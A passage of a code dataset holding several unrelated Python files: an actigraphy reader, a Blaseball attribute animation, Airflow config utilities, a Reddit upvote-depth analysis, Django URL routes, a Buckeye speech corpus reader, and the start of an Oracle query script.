', count)\n # ts=0\n\n \n\n# def plot_seaborn(df, fig_title):\n\n# sns.set(rc={'figure.figsize': (15, 5)}, style='white')\n# ax = sns.lineplot( data=long_df, x='date', y='value', hue='datatype')\n\n####### main function ###########\nif __name__== '__main__':\n\n # the header in line 10 of the csv file\n header_location=10\n df1 = pd.read_csv(\"../data/p00/Turner Chest1secDataTable.csv\", header=header_location, decimal=',', usecols=['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude'])\n # print(df.empty)\n # print(df.shape)\n print(df1.columns)\n print(df1.head)\n print(df1.info())\n \n df2 = pd.read_csv(\"../data/p00/Turner Thigh1secDataTable.csv\", header=header_location, decimal=',', usecols=['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude'])\n # print(df.empty)\n # print(df.shape)\n print(df2.columns)\n # print(df.head)1\n print(df2.info())\n \n \n # print(df.describe())\n # print(df['Inclinometer Off'].unique())\n # print(df['Inclinometer Off'].value_counts())\n # print(df.loc[(df['Date']=='13/12/2022'), ['Date',' Time','Vector Magnitude']])\n # print(df.loc[(df['Date']=='13/12/2022') & (df['Vector Magnitude'].isnull()), ['Date',' Time','Vector Magnitude']])\n # print(df.loc[(df['Date']=='13/12/2022') & ((df[' Axis1']>0)|(df['Axis2']>0)|(df['Axis3']>0)), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']])\n\n # print(df.loc[(df['Date']=='12/12/2022') & (df[' Time']>='22:00:00'), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']])\n # print(df.loc[(df['Date']=='13/12/2022') & (df[' Time']<='10:00:00'), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']])\n\n # plot_data(df1, 'chest')\n # plot_data(df2, 'thigh')\n # plt.show()\n\n time_start='22:00:00'\n time_end='10:00:00'\n same_day=False\n\n # time_start='04:45:00'\n # time_end='05:45:00'\n # same_day=True\n\n\n df_chest = getSelectedData(df1, time_start, time_end, same_day)\n df_thigh = getSelectedData(df2, time_start, time_end, same_day)\n # print(df1_nights.columns)\n # print(df1_nights.info())\n # print(df1_nights.head)\n\n plot_nights(df_chest, df_thigh)\n plt.show()\n\n\n\n # plt.figure(1)\n # nights_list = df_chest['night'].unique().tolist()\n # for night_num in nights_list[:1]:\n # mag_col = df_chest.loc[(df_chest['night']==night_num), ['Vector Magnitude']]\n # activity, inactivity = non_motion_periods(mag_col)\n # plt.subplot(211)\n # activityHistogram(activity, inactivity)\n\n # nights_list = df_thigh['night'].unique().tolist()\n # for night_num in nights_list[:1]:\n # mag_col = df_thigh.loc[(df_thigh['night']==night_num), ['Vector Magnitude']]\n # activity, inactivity = non_motion_periods(mag_col)\n # plt.subplot(212)\n # activityHistogram(activity, inactivity)\n\n # plt.show()\n\n\n\n # fig, axes = plt.subplots(nrows=3, ncols=3, subplot_kw={'ylim': (0,250)})\n\n # # df_one_day = df.loc[(df['Date']=='13/12/2022') & ((df[' Axis1']>0)|(df['Axis2']>0)|(df['Axis3']>0)), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n # row=0\n # col=0\n # for date in dates_list:\n # # date_0 = '12/12/2022'\n # # date_1 = '13/12/2022'\n # # date_2 = '14/12/2022'\n # # date_3 = '15/12/2022'\n\n # df_day = df.loc[(df['Date']==date), [' Time','Vector Magnitude']]\n # # df_day_0 = df.loc[(df['Date']==date_0), [' Time','Vector Magnitude']]\n # # df_day_1 = df.loc[(df['Date']==date_1), [' Time','Vector Magnitude']]\n # # df_day_2 = df.loc[(df['Date']==date_2), [' Time','Vector Magnitude']]\n # # df_day_3 = df.loc[(df['Date']==date_3), [' Time','Vector Magnitude']]\n # df_day.plot(x=' Time', y='Vector Magnitude', title='', ax=axes[row,col])\n # # df_day_0.plot(x=' Time', y='Vector Magnitude', title='Day '+ date_0, ax=axes[0,0])\n # # df_day_1.plot(x=' Time', y='Vector Magnitude', title='Day '+ date_1, ax=axes[0,1])\n # # df_day_2.plot(x=' Time', y='Vector Magnitude', title='Day '+ date_2, ax=axes[1,0])\n # # df_day_3.plot(x=' Time', y='Vector Magnitude', title='Day '+ date_3, ax=axes[1,1])\n # col+=1\n # if col==3:\n # col=0\n # row+=1\n\n\n # plt.show()\n\n # print(df.loc[df['Date']=='13/12/2022',['Time']])\n","repo_name":"gtibap/actigraph_hscm","sub_path":"scripts/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":13408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70589084995","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.animation import FuncAnimation\nfrom tqdm import tqdm\n\nATTRS = ['divinity', 'thwackability', 'moxie',\n 'musclitude', 'patheticism', 'martyrdom', 'tragicness', 'buoyancy',\n 'unthwackability', 'ruthlessness', 'overpowerment', 'shakespearianism',\n 'suppression', 'laserlikeness', 'continuation', 'base_thirst',\n 'indulgence', 'ground_friction', 'omniscience', 'tenaciousness',\n 'watchfulness', 'anticapitalism', 'chasiness']\n\nTEAM_IDS = list(reversed([\n \"b72f3061-f573-40d7-832a-5ad475bd7909\", # Lovers\n \"878c1bf6-0d21-4659-bfee-916c8314d69c\", # Tacos\n \"b024e975-1c4a-4575-8936-a3754a08806a\", # Steaks\n \"adc5b394-8f76-416d-9ce9-813706877b84\", # Breath Mints\n \"ca3f1c8c-c025-4d8e-8eef-5be6accbeb16\", # Firefighters\n \"bfd38797-8404-4b38-8b82-341da28b1f83\", # Shoe Thieves\n \"3f8bbb15-61c0-4e3f-8e4a-907a5fb1565e\", # Flowers\n \"979aee4a-6d80-4863-bf1c-ee1a78e06024\", # Fridays\n \"7966eb04-efcc-499b-8f03-d13916330531\", # Magic\n \"36569151-a2fb-43c1-9df7-2df512424c82\", # Millennials\n \"8d87c468-699a-47a8-b40d-cfb73a5660ad\", # Crabs\n \"23e4cbc1-e9cd-47fa-a35b-bfa06f726cb7\", # Pies\n \"f02aeae2-5e6a-4098-9842-02d2273f25c7\", # Sunbeams\n \"57ec08cc-0411-4643-b304-0e80dbc15ac7\", # Wild Wings\n \"747b8e4a-7e50-4638-a973-ea7950a3e739\", # Tigers\n \"eb67ae5e-c4bf-46ca-bbbc-425cd34182ff\", # Moist Talkers\n \"9debc64f-74b7-4ae1-a4d6-fce0144b6ea5\", # Spies\n \"b63be8c2-576a-4d6e-8daf-814f8bcea96f\", # Dale\n \"105bc3ff-1320-4e37-8ef0-8d595cb95dd0\", # Garages\n \"a37f9158-7f82-46bc-908c-c9e2dda7c33b\", # Jazz Hands\n \"c73b705c-40ad-4633-a6ed-d357ee2e2bcf\", # Lift\n \"bb4a9de5-c924-4923-a0cb-9d1445f1ee5d\", # Worms\n \"46358869-dce9-4a01-bfba-ac24fc56f57e\", # Mechanics\n \"d9f89a8a-c563-493e-9d64-78e4f9a55d4a\", # Georgias\n \"2e22beba-8e36-42ba-a8bf-975683c52b5f\", # Queens\n \"b47df036-3aa4-4b98-8e9e-fe1d3ff1894b\", # Queens\n]))\n\n\ndef main():\n data = pd.read_csv('attributes_over_time.csv')\n\n fig = plt.figure(figsize=(16, 12))\n ax = fig.add_axes([0.2, 0.025, 0.6, 0.9])\n\n prev_labels = [tid for tid in TEAM_IDS]\n\n zeros = np.zeros(len(TEAM_IDS), dtype=np.float64)\n bar_artists = [\n (attr, ax.barh(prev_labels, zeros, label=attr, left=zeros))\n for attr in ATTRS\n ]\n\n ax.set_title(\"Attributes over time\")\n ax.set_xlim((0, 21))\n\n ax.legend(bbox_to_anchor=(1.25, 1))\n title_artist = ax.text(0.5, 0.975, \"asdfasfdasdf\",\n bbox={'facecolor': 'w', 'alpha': 0.5, 'pad': 5},\n transform=ax.transAxes, ha=\"center\")\n\n def get_blitted_artists():\n return [\n *[patch\n for _, artist in bar_artists\n for patch in artist.patches],\n title_artist\n ]\n\n def func(frame_data):\n nonlocal prev_labels\n (season, day), rows = frame_data\n\n title_artist.set_text(f\"Season {season + 1} Day {day + 1}\")\n\n offsets = [0] * len(TEAM_IDS)\n for attr, bar_artist in bar_artists:\n for i, patch in enumerate(bar_artist.patches):\n width = rows[attr].get(TEAM_IDS[i], 0)\n patch.set_width(width)\n patch.set_x(offsets[i])\n offsets[i] += width\n\n labels = [\n rows['full_name'].get(team_id, \"\")\n for team_id in TEAM_IDS\n ]\n if labels != prev_labels:\n ax.set_yticklabels(labels)\n # Force a non-blit draw because blit doesn't update tick labels\n plt.draw()\n prev_labels = labels\n\n return get_blitted_artists()\n\n groups = data.set_index('team_id').groupby(['season', 'day'])\n frame_iter = tqdm(iter(groups), total=len(groups), unit='frame')\n ani = FuncAnimation(fig, func, frames=frame_iter,\n init_func=get_blitted_artists, blit=True, interval=1)\n\n ani.save(\"attributes_over_time.mp4\", fps=30)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"beiju/blaseball_analysis","sub_path":"misc/attributes_over_time.py","file_name":"attributes_over_time.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20905336588","text":"import logging\nimport sys\nimport os\nimport yaml\n\nfrom airflow.models import Variable\n\n# -------------------------------------------\n# Set up logging\n# -------------------------------------------\n\n# setup logging and logger\nlogging.basicConfig(format='[%(levelname)-5s][%(asctime)s][%(module)s:%(lineno)04d] : %(message)s',\n level=logging.INFO,\n stream=sys.stderr)\n\n# define logger\nlogger: logging.Logger = logging.getLogger()\nlogger.setLevel(level=logging.INFO)\n\n\ndef get_this_dir(filepath: str = __file__) -> str:\n \"\"\"helper function to return this (python) file directory\"\"\"\n return os.path.dirname(os.path.abspath(filepath))\n\n\n# -------------------------------------------\n# Load config file\n# -------------------------------------------\n\n# default config file path when running locally (not within airflow docker container)\n# get the path from airflow variables OR set it to default local path\n_default_config_path = os.path.join(get_this_dir(), '../phil_config.yaml')\nCONF_PATH = Variable.get('config_file', default_var=_default_config_path)\nconfig: dict = {}\nwith open(CONF_PATH) as open_yaml:\n config: dict = yaml.full_load(open_yaml)\n logger.info(f\"loaded configurations file: {CONF_PATH}\")\n\n\n# Set data dir path\n# ---------------------------------------------\n# default config file path when running locally (not within airflow docker container)\n# get the path from airflow variables OR set it to default local path\n_default_data_dir_path = os.path.join(get_this_dir(), '../data')\nDATA_DIR = Variable.get('data_dir', default_var=_default_data_dir_path)","repo_name":"ChloeL6/Stock-vs-Inflation","sub_path":"dsa-airflow/dags/phil_utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1620788523","text":"import praw\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#set your reddit information to enable praw\r\nreddit = praw.Reddit(client_id='',\r\n client_secret='',\r\n\t\t\t\t\t password='',\r\n user_agent='',\r\n\t\t\t\t\t username='')\r\n\r\n#top 50 subreddits\r\nlistOfSubs = ['funny' ,'AskReddit' ,'todayilearned' ,'science' ,'worldnews' ,'pics' ,'IAmA' ,'gaming' ,'videos' ,'movies' ,'aww' ,'Music' ,'blog' ,'gifs' ,'news' ,'explainlikeimfive' ,'askscience' ,'EarthPorn' ,'books' ,'television' ,'mildlyinteresting' ,'LifeProTips' ,'Showerthoughts' ,'space' ,'DIY' ,'Jokes' ,'gadgets' ,'nottheonion' ,'sports' ,'tifu' ,'food' ,'photoshopbattles' ,'Documentaries' ,'Futurology' ,'history' ,'InternetIsBeautiful' ,'dataisbeautiful' ,'UpliftingNews' ,'listentothis' ,'GetMotivated' ,'personalfinance' ,'OldSchoolCool' ,'philosophy' ,'Art' ,'nosleep' ,'WritingPrompts' ,'creepy' ,'TwoXChromosomes' ,'Fitness' ]\r\n\r\nmaxDepth = 15\r\nsuma_up = [0] * maxDepth\r\nilosc = [0] * maxDepth\r\nnumber_of_posts = 0\r\n\r\nfor sub in listOfSubs:\r\n print(sub)\r\n subreddit = reddit.subreddit(sub)\r\n top_posts = subreddit.top(time_filter='all', limit=30 )\r\n\r\n for submission in top_posts:\r\n #print(submission.title)\r\n submission.comments.replace_more(limit=0) #limit=0 żeby tylko jedną paczkę pobierało\r\n submission.comment_sort = 'best'\r\n comment_queue = submission.comments[:] # Seed with top-level [:10] żeby 10 pierwszych\r\n while comment_queue:\r\n \tcomment = comment_queue.pop(0)\r\n \t#print(comment.author, ' ', comment.ups, ' Głębokość: ', comment.depth)\r\n \tsuma_up[comment.depth] += comment.ups\r\n \tilosc[comment.depth] += 1\r\n \tcomment_queue.extend(comment.replies)\r\n print(suma_up)\r\n print(ilosc)\r\n\r\nsum = np.array(suma_up)\r\nqty = np.array(ilosc)\r\nhisto = sum/qty\r\nprint(histo)\r\n\r\n\r\nfor ile in qty:\r\n number_of_posts+=ile\r\n\r\n# Create scatter plot\r\nplt.scatter(range(0,maxDepth), histo, s=qty * (1000/qty[0]), label='Size translates to quantity')\r\nplt.yscale('log', basey=2)\r\n\r\nplt.xticks(np.arange(0, 10, 1))\r\n\r\nplt.title('Average upvotes for each comment level depth \\n (All Comments until \"More comments...\")')\r\nplt.xlabel('Comment level depth')\r\nplt.ylabel('Avg. Upvotes')\r\n\r\nlegend = plt.legend(loc='upper right', shadow=True, fontsize='medium')\r\nlegend.get_frame().set_facecolor('ivory')\r\n\r\nprint(number_of_posts)\r\n\r\nplt.show()\r\n","repo_name":"matkurek/redditCommentsDepth","sub_path":"Depths.py","file_name":"Depths.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7625616279","text":"from django.contrib import admin\nfrom django.conf import settings\nfrom django.urls import include, path\nfrom eTutor import views as etutor_views\nfrom django.conf.urls import url\n\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', etutor_views.homePage, name=\"homepage\"),\n path('accounts/', include('registration.backends.simple.urls')),\n path('users/', etutor_views.usersPage, name=\"all_users\"),\n path('rooms/', etutor_views.public_rooms, name=\"all_rooms\"),\n path('my_dms/', etutor_views.my_dms),\n path('rooms/', etutor_views.room_detail),\n path('rooms//dm_users/', etutor_views.dm_users),\n path('rooms//message_read/', etutor_views.message_read),\n path('videoChat/', etutor_views.video_chat, name=\"video_chat\"),\n url(r'token$', etutor_views.token, name=\"token\"),\n path('direct_message/', etutor_views.direct_message),\n path('edit/', etutor_views.user_edit, name=\"user_edit\"),\n path('users/friend_request', etutor_views.friend_request),\n path('users/like/', etutor_views.like, name=\"like\"),\n path('users/dislike/', etutor_views.dislike, name=\"dislike\"),\n path('my_friends/', etutor_views.my_friends),\n path('friend_requests/', etutor_views.friend_requests),\n path('notification/get/', etutor_views.get_notifications),\n path('friend_requests/mark_read', etutor_views.mark_read),\n path('rooms//new_dm/', etutor_views.new_dm),\n]\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n path('__debug__/', include(debug_toolbar.urls)),\n\n # For django versions before 2.0:\n # url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n","repo_name":"momentum-Tutor/eTutor","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36233462377","text":"\"\"\"Classes and functions to read and loop through the Buckeye Corpus.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n\nimport bisect\nimport glob\nimport io\nimport os.path\nimport re\nimport wave\nimport zipfile\n\nfrom .containers import Word, Pause, LogEntry, Phone\n\n\nSPEAKERS = {'s01': ('f', 'y', 'f'), 's02': ('f', 'o', 'm'),\n 's03': ('m', 'o', 'm'), 's04': ('f', 'y', 'f'),\n 's05': ('f', 'o', 'f'), 's06': ('m', 'y', 'f'),\n 's07': ('f', 'o', 'f'), 's08': ('f', 'y', 'f'),\n 's09': ('f', 'y', 'f'), 's10': ('m', 'o', 'f'),\n 's11': ('m', 'y', 'm'), 's12': ('f', 'y', 'm'),\n 's13': ('m', 'y', 'f'), 's14': ('f', 'o', 'f'),\n 's15': ('m', 'y', 'm'), 's16': ('f', 'o', 'm'),\n 's17': ('f', 'o', 'm'), 's18': ('f', 'o', 'f'),\n 's19': ('m', 'o', 'f'), 's20': ('f', 'o', 'f'),\n 's21': ('f', 'y', 'm'), 's22': ('m', 'o', 'f'),\n 's23': ('m', 'o', 'm'), 's24': ('m', 'o', 'm'),\n 's25': ('f', 'o', 'm'), 's26': ('f', 'y', 'f'),\n 's27': ('f', 'o', 'm'), 's28': ('m', 'y', 'm'),\n 's29': ('m', 'o', 'f'), 's30': ('m', 'y', 'm'),\n 's31': ('f', 'y', 'm'), 's32': ('m', 'y', 'f'),\n 's33': ('m', 'y', 'f'), 's34': ('m', 'y', 'm'),\n 's35': ('m', 'o', 'm'), 's36': ('m', 'o', 'f'),\n 's37': ('f', 'y', 'm'), 's38': ('m', 'o', 'm'),\n 's39': ('f', 'y', 'm'), 's40': ('m', 'y', 'f')}\n\n\nTRACK_RE = r's[0-4][0-9]/s[0-4][0-9]0[0-6][ab]\\.zip'\n\n\nclass Speaker(object):\n \"\"\"Iterable of Track instances for one Buckeye speaker, with metadata.\n\n Use Speaker.from_zip(path) to initialize a Speaker from a single zip file.\n\n Parameters\n ----------\n name : str\n Code-name for the speaker in the Buckeye Corpus (e.g., 's01').\n\n tracks : list of Track\n Track instances containing the annotations and recordings for this\n speaker, as read from e.g. s0101a.zip, s0101b.zip, etc.\n\n Attributes\n ----------\n name : str\n Code-name for the speaker in the Buckeye Corpus (e.g., 's01').\n\n sex : str\n Sex of the speaker ('f' for female or 'm' for male)\n\n age : str\n Age of the speaker ('o' for older than 40, 'y' for younger)\n\n interviewer : str\n Sex of the person who interviewed the speaker ('f' or 'm')\n\n tracks : list of Track\n Track instances containing the annotations and recordings for this\n speaker, as read from e.g. s0101a.zip, s0101b.zip, etc.\n\n \"\"\"\n\n def __init__(self, name, tracks):\n self.name = name\n self.sex, self.age, self.interviewer = SPEAKERS[self.name]\n self.tracks = tracks\n\n @classmethod\n def from_zip(cls, path, load_wavs=False):\n \"\"\"Return a Speaker instance from a zip file.\n\n Parameters\n ----------\n path : str\n Path to a zipped speaker archive (e.g., 's01.zip').\n\n load_wavs : bool, optional\n If True, the .wav files in the archive are read into the Track\n instances, in addition to the text annotations. Default is False.\n\n Returns\n -------\n Speaker\n\n \"\"\"\n\n name = os.path.splitext(os.path.basename(path))[0]\n\n tracks = []\n\n speaker = zipfile.ZipFile(path)\n\n for zip_path in sorted(speaker.namelist()):\n if re.match(TRACK_RE, zip_path):\n data = zipfile.ZipFile(io.BytesIO(speaker.read(zip_path)))\n tracks.append(Track.from_zip(zip_path, data, load_wavs))\n\n speaker.close()\n\n return cls(name, tracks)\n\n def __iter__(self):\n return iter(self.tracks)\n\n def __getitem__(self, i):\n return self.tracks[i]\n\n def __repr__(self):\n return 'Speaker(\"{}\")'.format(self.name)\n\n def __str__(self):\n return ''.format(self.name, self.sex, self.age)\n\n\nclass Track(object):\n \"\"\"Corpus data from one track archive file (e.g., s0101a.zip).\n\n Use Track.from_zip(path) to initialize a Track from a single zip file.\n\n Parameters\n ----------\n name : str\n Name of the track file (e.g., 's0101a')\n\n words : str or file\n Path to the .words file associated with this track (e.g.,\n 's0101a.words'), or an open file(-like) object.\n\n phones : str or file\n Path to the .phones file associated with this track (e.g.,\n 's0101a.phones'), or an open file(-like) object.\n\n log : str or file\n Path to the .log file associated with this track (e.g.,\n 's0101a.log'), or an open file(-like) object.\n\n txt : str or file\n Path to the .txt file associated with this track (e.g.,\n 's0101a.txt'), or an open file(-like) object.\n\n wav : str or file, optional\n Path to the .wav file associated with this track (e.g.,\n 's0101a.wav'), or an open file(-like) object.\n\n Attributes\n ----------\n name : str\n Name of the track file (e.g., 's0101a')\n\n words : list of Word and Pause\n Chronological list of Word and Pause instances that are\n constructed from the .words file in this track.\n\n phones : list of Phone\n Chronological list of Phone instances that are constructed from\n the .phones file in this track.\n\n log : list of LogEntry\n Chronological list of LogEntry instances that are constructed from\n the .log file in this track.\n\n txt : list of str\n Chronological list of transcriptions of each turn from the .txt\n file in this track (not time-aligned).\n\n wav : wave.Wave_read\n An open wave.Wave_read instance for the .wav file in this track.\n If this track was constructed with `load_wav=False`, this\n attribute is not present.\n\n \"\"\"\n\n def __init__(self, name, words, phones, log, txt, wav=None):\n self.name = name\n\n # read and store text info\n if not hasattr(words, 'readline'):\n words = io.open(words, encoding='latin-1')\n\n self.words = list(process_words(words))\n words.close()\n\n if not hasattr(phones, 'readline'):\n phones = io.open(phones, encoding='latin-1')\n\n self.phones = list(process_phones(phones))\n phones.close()\n\n if not hasattr(log, 'readline'):\n log = io.open(log, encoding='latin-1')\n\n self.log = list(process_logs(log))\n log.close()\n\n if not hasattr(txt, 'readline'):\n txt = io.open(txt, encoding='latin-1')\n\n self.txt = txt.read().splitlines()\n txt.close()\n\n # optionally store the sound file\n if wav is not None:\n self.wav = wave.open(wav)\n\n # add references in self.words to the corresponding self.phones\n self._set_phones()\n\n # make a list of the log entry timestamps to quickly search later\n self._log_begs = [l.beg for l in self.log]\n self._log_ends = [l.end for l in self.log]\n\n def __repr__(self):\n return 'Track(\"{}\")'.format(self.name)\n\n def __str__(self):\n return ''.format(self.name)\n\n @classmethod\n def from_zip(cls, path, data=None, load_wav=False):\n \"\"\"Return a Track instance from a zip file.\n\n Parameters\n ----------\n path : str\n Path to a zipped track archive (e.g., 's01/s0101a.zip').\n\n data : zipfile.ZipFile, optional\n ZipFile instance containing track data, required if `path`\n points to a zipped archive nested inside another archive. Default\n is None.\n\n load_wav : bool, optional\n If True, the .wav file will be read into the Track instance, in\n addition to the text annotations. Default is False.\n\n Returns\n -------\n Track\n\n \"\"\"\n\n if data is None:\n data = zipfile.ZipFile(path)\n\n name = os.path.splitext(os.path.basename(path))[0]\n\n words = io.StringIO(data.read(name + '.words').decode('latin-1'))\n phones = io.StringIO(data.read(name + '.phones').decode('latin-1'))\n log = io.StringIO(data.read(name + '.log').decode('latin-1'))\n txt = io.StringIO(data.read(name + '.txt').decode('latin-1'))\n\n if load_wav:\n wav = io.BytesIO(data.read(name + '.wav'))\n\n else:\n wav = None\n\n return cls(name, words, phones, log, txt, wav)\n\n def _set_phones(self):\n \"\"\"\n Private method used to add references in each Word and Pause\n instance to the corresponding Phone instances in this track.\n\n Notes\n -----\n A Phone is counted as belonging to a Word or Pause if at least\n half of the Phone's duration occurs between the `beg` and `end`\n timestamps of the Word or Pause.\n\n \"\"\"\n\n phone_mids = [p.beg + 0.5 * p.dur for p in self.phones]\n\n for word in self.words:\n left = bisect.bisect_left(phone_mids, word.beg)\n right = bisect.bisect_left(phone_mids, word.end)\n\n word._phones = self.phones[left:right]\n\n def clip_wav(self, clip, beg, end):\n \"\"\"Write a new .wav file containing a clip from this track.\n\n Parameters\n ----------\n clip : str\n Path to the new .wav file.\n\n beg : float\n Time in the track .wav file where the clip should begin.\n\n end : float\n Time in the track .wav file where the clip should end.\n\n Returns\n -------\n None\n\n \"\"\"\n\n framerate = self.wav.getframerate()\n length = end - beg\n\n frames = int(round(length * framerate))\n beg_frame = int(round(beg * framerate))\n\n wav_out = wave.open(clip, 'wb')\n\n wav_out.setparams(self.wav.getparams())\n self.wav.setpos(beg_frame)\n wav_out.writeframes(self.wav.readframes(frames))\n\n wav_out.close()\n\n def get_logs(self, beg, end):\n \"\"\"Return log entries that overlap with a given interval.\n\n The interval does not include the log entry boundaries. For\n example, calling `get_logs(1.5, 2)` will not return a log entry\n that extends from 1.25 seconds to 1.5 seconds, or one that\n extends from 2 seconds to 2.5 seconds.\n\n Parameters\n ----------\n beg : float\n Beginning of the interval.\n\n end : float\n End of the interval.\n\n Returns\n -------\n logs : list of LogEntry\n List of references to the LogEntry instances in this track\n that overlap with the interval given by `[beg, end]`.\n\n \"\"\"\n\n left_idx = bisect.bisect(self._log_ends, beg)\n right_idx = bisect.bisect_left(self._log_begs, end)\n\n return self.log[left_idx:right_idx]\n\n\ndef corpus(path, load_wavs=False):\n \"\"\"Yield Speaker instances from a folder of zipped speaker archives.\n\n Parameters\n ----------\n path : str\n Path to a directory containing all of the zipped speaker archives\n in the Buckeye Corpus (s01.zip, s02.zip, ..., s40.zip).\n\n load_wavs : bool, optional\n If True, the .wav files are read into the Track instances in the\n yielded Speaker instances. Default is False.\n\n Yields\n ------\n Speaker\n One Speaker instance for each zipped speaker archive in the\n folder given by `path`.\n\n \"\"\"\n\n zip_paths = sorted(glob.glob(os.path.join(path, 's[0-4][0-9].zip')))\n\n for zip_path in zip_paths:\n yield Speaker.from_zip(zip_path, load_wavs)\n\n\ndef process_logs(logs):\n \"\"\"Yield LogEntry instances from a .log file in the Buckeye Corpus.\n\n Parameters\n ----------\n logs : file-like\n Open file-like object created from a .log file in the Buckeye\n Corpus.\n\n Yields\n ------\n LogEntry\n One LogEntry instance for each entry in the .log file, in\n chronological order.\n\n \"\"\"\n\n # skip the header\n line = logs.readline()\n\n while not line.startswith('#'):\n if line == '':\n raise EOFError\n\n line = logs.readline()\n\n line = logs.readline()\n\n # iterate over entries\n previous = 0.0\n while line != '':\n try:\n time, color, entry = line.split(None, 2)\n entry = entry.strip()\n\n except ValueError:\n if line == '\\n':\n line = logs.readline()\n continue\n\n time, color = line.split()\n entry = None\n\n time = float(time)\n yield LogEntry(entry, previous, time)\n\n previous = time\n line = logs.readline()\n\n\ndef process_phones(phones):\n \"\"\"Yield Phone instances from a .phones file in the Buckeye Corpus.\n\n Parameters\n ----------\n phones : file-like\n Open file-like object created from a .phones file in the Buckeye\n Corpus.\n\n Yields\n ------\n Phone\n One Phone instance for each entry in the .phones file, in\n chronological order.\n\n \"\"\"\n\n # skip the header\n line = phones.readline()\n\n while not line.startswith('#'):\n if line == '':\n raise EOFError\n\n line = phones.readline()\n\n line = phones.readline()\n\n # iterate over entries\n previous = 0.0\n while line != '':\n try:\n time, color, phone = line.split(None, 2)\n\n if '+1' in phone:\n phone = phone.replace('+1', '')\n\n if ';' in phone:\n phone = phone.split(';')[0]\n\n phone = phone.strip()\n\n except ValueError:\n if line == '\\n':\n line = phones.readline()\n continue\n\n time, color = line.split()\n phone = None\n\n time = float(time)\n yield Phone(phone, previous, time)\n\n previous = time\n line = phones.readline()\n\n\ndef process_words(words):\n \"\"\"Yield Word and Pause instances from a .words file.\n\n Parameters\n ----------\n words : file-like\n Open file-like object created from a .words file in the Buckeye\n Corpus.\n\n Yields\n ------\n Word, Pause\n One Word or Pause instance for each entry in the .words file, in\n chronological order. Entries that begin with '{' or '<' are\n yielded as Pause instances. All other entries are yielded as Word\n instances.\n\n \"\"\"\n\n # skip the header\n line = words.readline()\n\n while not line.startswith('#'):\n if line == '':\n raise EOFError\n\n line = words.readline()\n\n line = words.readline()\n\n # iterate over entries\n previous = 0.0\n while line != '':\n fields = [l.strip() for l in line.strip().split(';')]\n\n try:\n word, phonemic, phonetic, pos = fields\n phonemic = phonemic.split()\n phonetic = phonetic.split()\n\n except ValueError:\n if line == '\\n':\n line = words.readline()\n continue\n\n # 22 entries have missing fields, including 11 CUTOFF, ERROR, and\n # E_TRANS entries\n if len(fields) == 2:\n word, pos = fields\n phonemic = None\n\n elif len(fields) == 3:\n word, phonemic, pos = fields\n phonemic = phonemic.split()\n\n phonetic = None\n\n # s1801a has a missing newline in the first entry, with SIL and\n # B_TRANS on the same line with the same timestamp\n time, color, word = (w.strip() for w in word.split(None, 2))\n\n time = float(time)\n\n # 1603b starts at -1.0s, and 2801a has one line that has a timestamp\n # that precedes the timestamp on the previous line\n # for these entries, the misaligned attribute will be set to True\n\n if word.startswith('<') or word.startswith('{'):\n yield Pause(word, previous, time)\n\n else:\n yield Word(word, previous, time, phonemic, phonetic, pos)\n\n previous = time\n line = words.readline()\n","repo_name":"scjs/buckeye","sub_path":"buckeye/buckeye.py","file_name":"buckeye.py","file_ext":"py","file_size_in_byte":16047,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"24612471261","text":"print('smth\\n'\r\n '\\n'\r\n 'Wait for further instructions...')\r\n\r\n\r\nimport cx_Oracle as cx\r\nimport pandas as pd\r\nimport datetime\r\nimport sys\r\nimport os\r\nimport numpy as np\r\n\r\nyear_input = int(input('Type year:'))\r\nmonth_input = int(input('Type month:'))\r\n\r\nprint('Connecting to DWH1...')\r\ndsn_new = \"\"\"\r\n#connection just like Oracle likes \r\n\"\"\"\r\nconnection_new = cx.connect(..., dsn_new)\r\n\r\nprint('Query in progress...')\r\n\r\nquery_new = \"\"\"select *\r\n from _\r\n where _ is not null\"\"\"\r\n\r\nbank_subs = pd.read_sql(query_new,\r\n con=connection_new,\r\n index_col='APP_NUMBER',\r\n parse_dates=['PERIOD_DT',\r\n 'CONTRACT_DT',\r\n 'RETAIL_DT',\r\n 'DELIVERY_DT',\r\n 'REGISTRION_DT',\r\n ]\r\n )\r\n\r\nprint('Connecting to DWH2...')\r\n\r\ndsn = \"\"\"!!!\r\n\"\"\"\r\nconnection = cx.connect(\"!!!\", dsn)\r\n\r\nprint('Query in progress...')\r\n\r\n\r\nquery = open(\"query_indicator.sql\", \"r\").read()\r\n\r\nquery = query.format(year_input, month_input)\r\n\r\nind_month = pd.read_sql(query,\r\n con=connection,\r\n index_col='APP_NUMBER',\r\n parse_dates=['DATE',\r\n 'BIRTHDAY',\r\n 'DATE',\r\n ]\r\n )\r\n\r\nprint('Checking for input period:')\r\n\r\nif ((bank_subs['PERIOD_DT'].dt.month == month_input) &\r\n (year_input == 